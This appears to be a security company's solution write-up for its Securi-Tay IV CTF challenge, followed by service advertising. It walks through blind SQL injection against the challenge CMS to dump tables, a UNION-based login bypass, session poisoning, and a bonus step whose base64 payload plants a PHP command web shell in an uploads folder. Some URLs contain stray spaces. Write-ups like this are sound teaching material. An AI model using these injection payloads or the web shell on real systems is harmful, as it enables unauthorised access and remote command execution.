Pentest were pleased to sponsor Securi-Tay IV at Abertay University on 27th February 2015. Thanks to everyone who took part in the challenge at Securi-Tay IV. We hope you enjoyed it. Nobody quite succeeded in breaking the challenge at the event, but one team was very close, so congratulations to them.
If you want to have a go at the challenge, it can be found online at http://securi-tay-2015.pentest-challenge.co.uk/ along with a few hints. The challenge was designed to be difficult, so best of luck to anyone attempting it. If you are going to attempt the challenge, stop reading now! There are spoilers below.
1. Blind injection, Dump Database
The app consists of a username/password authentication. First we establish that the log in is vulnerable to SQL injection. Once SQL injection vulnerability has been established, the objective is to extract the database. We use the following query:
"username=admin&password=sdd'and(0)like(0)escape(case(1)when (1=1*)then(1)else(12)end)-- -" -p "username" -u "http: //securi-tay-2015-cms.pentest-challenge.co.uk/" -D securi-tay-20 15-cms -T auth --dump
We extract the authorisation table and the users table:
2. POST Request
Using the extracted SQL data, the next step is to construct a valid SQL query which will return a valid result for the authentication SQL query.
POST http://securi-tay-2015-cms.pentest-challenge.co.uk/ username=1' union select 1,2,3,4,'dXNlcmF1dGhfbG9naW58czoxOiIxIjs='-- -&password=1
Notice that the cookie PHPSESSID value has changed to "4" in your browser.
3. Download the CMS
4. Access the login screen
Access http://securi-tay-2015.pentest-challenge.co.uk/ and set the session id in your browser to the extracted "eaoiqaujfo3c16tqvjarukbrr7"
Next you need to construct a string which will be recognised as valid. You can create a valid serialised string using your own IP address. For example, if you Base64 encode the IP address:
you create the string:
Construct and send the post query to the CMS and exploit the share hosting session poisoning issue:
POST http://securi-tay-2015-cms.pentest-challenge.co.uk/ username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoyMDoi YWRtaW4tOTAuMjQ0LjE1Ny4yMTIiOw=='--
Replace '4' with the session id extracted from the current id being presented at http://securi-tay-2015.pentest-challenge.co.uk/.
POST http://securi-tay-2015-cms.pentest-challenge.co.uk/ username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoxOiIx Ijs='--
5. File upload
This was a bonus challenge created for those who managed to complete the main challenge.
username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5', '<session><id>any</id><value> TzoxODoiVXNlckF1dGhlbnRpY2F0aW9uIjoxOntzOjY6ImNvbmZpZyI7YTozOntz Ojg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjQ6Imhhc2giO3M6NDoiZXhlYyI7 czo4OiJwYXNzd29yZCI7czo4NToiZWNobyBQRDl3YUhBZ2MzbHpkR1Z0S0NSZlIw VlVXeUpqYldRaVhTa2dQejQ9IHwgYmFzZTY0IC0tZGVjb2RlID4+IC4vdXBsb2Fk cy90bXA4LnBocCI7fX0= </value></session>' -- -&password=1
The prize was a set of Beats® wireless speakers, plus a bonus prize for anyone who succeeded in uploading a file to the app.
The winning team consisted of:
Congratulations to both.
Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.
Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.